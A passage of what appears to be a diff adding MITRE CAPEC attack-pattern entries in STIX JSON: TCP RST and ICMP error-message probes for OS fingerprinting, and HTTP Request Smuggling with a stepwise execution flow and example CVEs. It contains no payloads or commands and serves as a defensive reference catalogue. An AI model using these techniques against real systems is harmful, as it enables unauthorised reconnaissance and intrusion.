receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe performs a checksum on any ASCII data contained within the data portion or a RST packet. Some operating systems will report a human-readable text message in the payload of a 'RST' (reset) packet when specific types of connection errors occur. RFC 1122 allows text payloads within reset packets but not all operating systems or routers implement this functionality.", + "external_references": [ + { + "external_id": "CAPEC-328", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/328.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2d865521-82f5-42e5-a595-dc93f60dfd3f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP 'RST' Flag Checksum Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the amount of data returned or \"Quoted\" from the originating request that generated the ICMP error message.", + "external_references": [ + { + "external_id": "CAPEC-329", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/329.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-123", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc792.html" + }, + { + "description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "external_id": "REF-124", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc1122.html" + }, + { + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "external_id": "REF-262", + "source_name": "reference_from_CAPEC", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf" + } + ], + "id": "attack-pattern--1059e91f-43ff-4a00-bc74-4110979f5247", + "modified": "2022-02-22T00:00:00.000Z", + "name": "ICMP Error Message Quoting Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For this purpose \"Port Unreachable\" error messages are often used, as generating them requires the adversary to send a UDP datagram to a closed port on the target. The goal of this analysis to make inferences about the type of operating system or firmware that sent the error message in reply.\n This is useful for identifying unique characteristics of operating systems because the RFC-1122 expected behavior reads: \"Every ICMP error message includes the Internet header and at least the first 8 data octets of the datagram that triggered the error; more than 8 octets MAY be sent [...].\" This contrasts with RFC-792 expected behavior, which limited the quoted text to 64 bits (8 octets). Given the latitude in the specification the resulting RFC-1122 stack implementations often respond with a high degree of variability in the amount of data quoted in the error message because \"older\" or \"legacy\" stacks may comply with the RFC-792 specification, while other stacks may choose a longer format in accordance with RFC-1122. As a general rule most operating systems or firmware will quote the first 8 bytes of the datagram triggering the error, but some IP stacks will quote more than the first 8 bytes of data.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary abuses the flexibility and discrepancies in the parsing and interpretation of HTTP Request messages using various HTTP headers, request-line and body parameters as well as message sizes (denoted by the end of message signaled by a given HTTP header) by different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) to secretly send unauthorized and malicious HTTP requests to a back-end HTTP agent (e.g., web server).\n See CanPrecede relationships for possible consequences.\n ", + "external_references": [ + { + "external_id": "CAPEC-33", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/33.html" + }, + { + "external_id": "CWE-444", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/444.html" + }, + { + "description": "HTTP Request Smuggling", + "external_id": "26", + "source_name": "WASC", + "url": "http://projects.webappsec.org/HTTP-Request-Smuggling" + }, + { + "description": "HTTP 1.1 Specification (RFC 2616), IETF RFC", + "external_id": "REF-38", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc2616.txt" + }, + { + "description": "HTTP Response Smuggling, Beyond Security", + "external_id": "REF-117", + "source_name": "reference_from_CAPEC", + "url": "http://www.securiteam.com/securityreviews/5CP0L0AHPC.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-617", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.html" + }, + { + "description": "Robert Auger, HTTP Request Smuggling, 2010--01, The Web Application Security Consortium", + "external_id": "REF-672", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246928/HTTP%20Request%20Smuggling" + }, + { + "description": "Dzevad Alibegovic, HTTP Request Smuggling: Complete Guide to Attack Types and Prevention, 2021--08---23, NeuraLegion", + "external_id": "REF-673", + "source_name": "reference_from_CAPEC", + "url": "https://www.neuralegion.com/blog/http-request-smuggling-hrs/" + }, + { + "description": "Busra Demir, A Pentester’s Guide to HTTP Request Smuggling, 2020--10---15, Cobalt", + "external_id": "REF-674", + "source_name": "reference_from_CAPEC", + "url": "https://cobalt.io/blog/a-pentesters-guide-to-http-request-smuggling" + }, + { + "description": "Edi Kogan, Daniel Kerman, HTTP Desync Attacks in the Wild and How to Defend Against Them, 2019--10---29, Imperva", + "external_id": "REF-678", + "source_name": "reference_from_CAPEC", + "url": "https://www.imperva.com/blog/http-desync-attacks-and-defence-methods/" + }, + { + "description": "James Kettle, HTTP Desync Attacks: Request Smuggling Reborn, 2019--08---07, PortSwigger", + "external_id": "REF-681", + "source_name": "reference_from_CAPEC", + "url": "https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn" + }, + { + "description": "HTTP request smuggling, PortSwigger", + "external_id": "REF-682", + "source_name": "reference_from_CAPEC", + "url": "https://portswigger.net/web-security/request-smuggling" + }, + { + "description": "Finding HTTP request smuggling vulnerabilities, PortSwigger", + "external_id": "REF-683", + "source_name": "reference_from_CAPEC", + "url": "https://portswigger.net/web-security/request-smuggling/finding" + }, + { + "description": "Exploiting HTTP request smuggling vulnerabilities, PortSwigger", + "external_id": "REF-684", + "source_name": "reference_from_CAPEC", + "url": "https://portswigger.net/web-security/request-smuggling/exploiting" + } + ], + "id": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "modified": "2022-09-29T00:00:00.000Z", + "name": "HTTP Request Smuggling", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "HTTP Desync" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a", + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b", + "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84" + ], + "x_capec_child_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Execute Unauthorized Commands", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n When using Haproxy 1.5.3 version as front-end proxy server with with Node.js version 14.13.1 or 12.19.0 as the back-end web server it is possible to use two same header fields for example: two Transfer-Encoding, Transfer-Encoding: chunked and Transfer-Encoding: chunked-false, to bypass Haproxy /flag URI restriction and receive the Haproxy flag value, since Node.js identifies the first header but ignores the second header. See also: CVE-2020-8287\n ", + "\n When using Sun Java System Web Proxy Server 3.x or 4.x in conjunction with Sun ONE/iPlanet 6.x, Sun Java System Application Server 7.x or 8.x, it is possible to bypass certain application firewall protections, hijack web sessions, perform Cross Site Scripting or poison the web proxy cache using HTTP Request Smuggling. Differences in the way HTTP requests are parsed by the Proxy Server and the Application Server enable malicious requests to be smuggled through to the Application Server, thereby exposing the Application Server to aforementioned attacks. See also: CVE-2006-6276\n ", + "\n Apache server 2.0.45 and version before 1.3.34, when used as a proxy, easily lead to web cache poisoning and bypassing of application firewall restrictions because of non-standard HTTP behavior. Although the HTTP/1.1 specification clearly states that a request with both \"Content-Length\" and a \"Transfer-Encoding: chunked\" headers is invalid, vulnerable versions of Apache accept such requests and reassemble the ones with \"Transfer-Encoding: chunked\" header without replacing the existing \"Content-Length\" header or adding its own. This leads to HTTP Request Smuggling using a request with a chunked body and a header with \"Content-Length: 0\". See also: CVE-2005-2088\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey network to identify target: The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets.

    2. Techniques
    Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer.

Experiment

  1. Identify vulnerabilities in targeted HTTP infrastructure and technologies: The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, message sizes, and HTTP headers.

  2. Cause differential HTTP responses by experimenting with identified HTTP Request vulnerabilities: The adversary sends maliciously crafted HTTP requests to interfere with the parsing of intermediary and back-end HTTP infrastructure, followed by normal/benign HTTP request from the adversary or a random user. The intended consequences of the malicious HTTP requests will be observed in the HTTP infrastructure response to the normal/benign HTTP request to confirm applicability of identified vulnerabilities in the adversary's plan of attack.

    3. Techniques
    Continue the monitoring of HTTP traffic.
    \n Utilize various combinations of HTTP Headers within a single HTTP Request such as: Content-Length & Transfer-Encoding (CL;TE), Transfer-Encoding & Content-Length (TE;CL), or double Transfer-Encoding (TE;TE), so that additional embedded requests or data in the body of the original request are unprocessed and treated as part of subsequent requests by the intended target HTTP agent.\n From these HTTP Header combinations the adversary observes any timing delays (usually in the form of HTTP 404 Error response) or any other unintended consequences.\n \n For CL;TE and TE;CL HTTP header combinations, the first HTTP agent, in the HTTP message path that receives the HTTP request, takes precedence or only processes one header but not the other, while the second/final HTTP agent processes the opposite header, allowing for embedded HTTP requests to be ignored and smuggled to the intended target HTTP agent.\n For TE;TE HTTP headers combination, all HTTP agents in HTTP message path process Transfer-Encoding header, however, adversary obfuscation (see Mitigations for details) of one of the Transfer-Encoding headers, by not adhering strictly to the protocol specification, can cause it to be unprocessed/ignored by a designated HTTP agent, hence allowing embedded HTTP requests to be smuggled. .\n \n
    \n Construct a very large HTTP request using multiple Content-Length headers of various data lengths that can potentially cause subsequent requests to be ignored by an intermediary HTTP agent (firewall) and/or eventually parsed separately by the target HTTP agent (web server).\n Note that most modern HTTP infrastructure reject HTTP requests with multiple Content-Length headers.\n
    Follow an unrecognized (sometimes a RFC compliant) HTTP header with a subsequent HTTP request to potentially cause the HTTP request to be ignored and interpreted as part of the preceding HTTP request.

Exploit

  1. Perform HTTP Request Smuggling attack: Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.

    2. Techniques
    Leverage techniques identified in the Experiment Phase.
", + "x_capec_extended_description": "\n A maliciously crafted HTTP request, which contains a second secretly embedded HTTP request is interpreted by an intermediary web proxy as single benign HTTP request, is forwarded to a back-end server, that interprets and parses the HTTP request as two authorized benign HTTP requests bypassing security controls.\n This attack usually involves the misuse of the HTTP headers: Content-Length and Transfer-Encoding. These abuses are discussed in RFC 2616 #4.4.3 and section #4.2 and are related to ordering and precedence of these headers. [REF-38]\n Additionally this attack can be performed through modification and/or fuzzing of parameters composing the request-line of HTTP messages.\n This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions in the HTTP agents.\n This differs from CAPEC-273 HTTP Response Smuggling, which is usually an attempt to compromise a client agent (e.g., web browser) by sending malicious content in HTTP responses from back-end HTTP infrastructure. HTTP Request Smuggling is an attempt to compromise aback-end HTTP agentvia HTTP Request messages.\n HTTP Splitting (CAPEC-105 and CAPEC-34) is different from HTTP Smuggling due to the fact that during implementation of asynchronous requests, HTTP Splitting requires the embedding/injection of arbitrary HTML headers and content through user input into browser cookies or Ajax web/browser object parameters like XMLHttpRequest.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_peer_of_refs": [ + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974" + ], + "x_capec_prerequisites": [ + "An additional intermediary HTTP agent such as an application firewall or a web caching proxy between the adversary and the second agent such as a web server, that sends multiple HTTP messages over same network connection.", + "Differences in the way the two HTTP agents parse and interpret HTTP requests and its headers.", + "HTTP agents running on HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses." + ], + "x_capec_resources_required": [ + "Tools capable of crafting malicious HTTP messages and monitoring HTTP message responses." + ], + "x_capec_skills_required": { + "Medium": "Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f6100503-6f80-4635-b9dd-c9d1788158b5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94b24ec6-eaed-40ba-aa65-789101ea9a55", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ad42c576-3139-4cee-ab82-749f0c506f57", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64555d1a-a57e-49d9-b9f8-02c843ba1af5", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd575ece-d038-4eb4-82d2-cc0b2717655b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--77b0b8cc-d674-4ba6-979e-cae5adc89a5c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--65a59d08-b52c-4c78-b802-6e65c65f02e5", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5aa2cd65-f8bc-45da-a757-06ea485a0d3e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6d84e072-1001-4113-b462-004ab68ea8da", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4bd16590-2382-4a10-9712-f28b7bf84fec", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8ea59df1-f9e8-49e5-9fb1-39d689fd42cd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5cc83b32-2b3e-41e5-94e8-2e2ea48bf660", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dc7176bc-62c9-4fad-9036-5f5079477a3a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d39d9ad3-ca67-4292-8e1c-279a1dd878b5", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--78d6512c-86fb-4c96-b8f0-bebd67b26ece", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9475a8b1-13bc-4b75-b6b8-af4040ec7469", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4ec4cb3d-85a3-4f13-b540-d74a0a2024e1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8357749-6d25-4561-9c20-f8f937fb10f0", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--82300401-dfdb-4a55-b612-2e17989ee4ec", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--43085d5c-cd1e-4175-9d44-f28f8f3cc5f9", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bf4c2215-7fc8-46bd-9caf-9f6fc4c1c877", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--50ea55ae-d8a8-4279-9dc9-05b6fb416b84", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d07b5f41-bbd9-40f6-bd22-173bd6398815", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2e15722-f07d-44db-b988-af501e0f1e13", + "spec_version": "2.1", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the integrity of data returned or \"Quoted\" from the originating request that generated the error message.", + "external_references": [ + { + "external_id": "CAPEC-330", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/330.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-123", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc792.html" + }, + { + "description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "external_id": "REF-124", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc1122.html" + }, + { + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "external_id": "REF-262", + "source_name": "reference_from_CAPEC", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf" + } + ], + "id": "attack-pattern--420d73c3-133c-487e-a98a-6050e7680243", + "modified": "2022-02-22T00:00:00.000Z", + "name": "ICMP Error Message Echoing Integrity Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n A tremendous amount of information about the host operating system can be deduced from its 'echoing' characteristics. Notably, inspection of key protocol header fields, including the echoed header fields of the encapsulating protocol can yield a wealth of data about the host operating system or firmware version.\n For this purpose \"Port Unreachable\" error messages are often used, as generating them requires the adversary to send a UDP datagram to a closed port on the target. When replying with an ICMP error message some IP/ICMP stack implementations change aspects of the IP header, change or reverse certain byte orders, reset certain field values to default values which differ between operating system and firmware implementations, and make other changes. Some IP/ICMP stacks are decidedly broken, indicating an idiosyncratic behavior that differs from the RFC specifications, such as the case when miscalculations affect a field value.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary sends a UDP packet to a closed port on the target machine to solicit an IP Header's total length field value within the echoed 'Port Unreachable\" error message. This type of behavior is useful for building a signature-base of operating system responses, particularly when error messages contain other types of information that is useful identifying specific operating system responses.", + "external_references": [ + { + "external_id": "CAPEC-331", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/331.html" + }, + { + "external_id": "CWE-204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/204.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-123", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc792.html" + }, + { + "description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "external_id": "REF-124", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc1122.html" + }, + { + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "external_id": "REF-262", + "source_name": "reference_from_CAPEC", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf" + } + ], + "id": "attack-pattern--d9629af2-d5c2-4198-b80f-281cc7d04422", + "modified": "2023-01-24T00:00:00.000Z", + "name": "ICMP IP Total Length Field Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": 